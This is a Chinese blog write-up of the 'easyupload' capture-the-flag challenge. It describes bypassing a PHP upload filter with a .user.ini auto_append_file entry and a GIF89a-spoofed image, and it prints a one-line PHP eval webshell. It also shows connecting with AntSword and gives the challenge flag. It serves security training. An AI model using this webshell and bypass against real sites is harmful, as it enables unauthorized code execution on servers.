攻防世界easyupload

8 篇文章 0 订阅
6 篇文章 0 订阅
文章讲述了如何通过创建特殊配置的.user.ini文件和隐藏木马的GIF图片,利用auto_prepend_file和auto_append_file绕过PHP字符限制,成功上传并执行恶意代码,最终在服务器上获取flag的过程。
摘要由CSDN通过智能技术生成

一进来就是文件上传,但是试了一下直接传一句话木马文件没用,看其他的解题思路发现是上传的内容不能有php字符。了解到用到.user.ini 绕过

.

.user.ini中两个中的配置就是auto_prepend_file和auto_append_file。意思是指定一个文件,那么该文件就会被包含在要执行的php文件中(如index.php)。例如:auto_append_file=opium.jpg

 所以首先我们得到本地新建一个.user.ini文件和包含木马的a.jpg文件,因为木马中不能有php字符,所以一句话木马可以为<?=eval($_REQUEST['cmd']);?>,然后还要在两个文件中都写上GIF89a

GIF89a图片头文件欺骗,是一种攻击,让文件伪装成图片格式。

.user.ini文件内容:

 

 

 a.jpg文件内容:

 然后上传.user.ini再用bp抓包修改content-type为image/jpg,再放包

然后页面成功回显,显示上传成功,接着就再上传a.jpg。

 

然后就在bp放包放到下面这个a.jpg的页面出现为止,接着就再放一次包。

回到页面成功回显,上传成功。接着F12查看网络,然后找到图中红线标的url。

 

接着就用蚁剑连接,输入密码cmd。

 然后在目录中找到flag文件,得知flag:cyberpeace{3cbbd321de99c11d5fe8f17ccddf3b44} 

 

  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值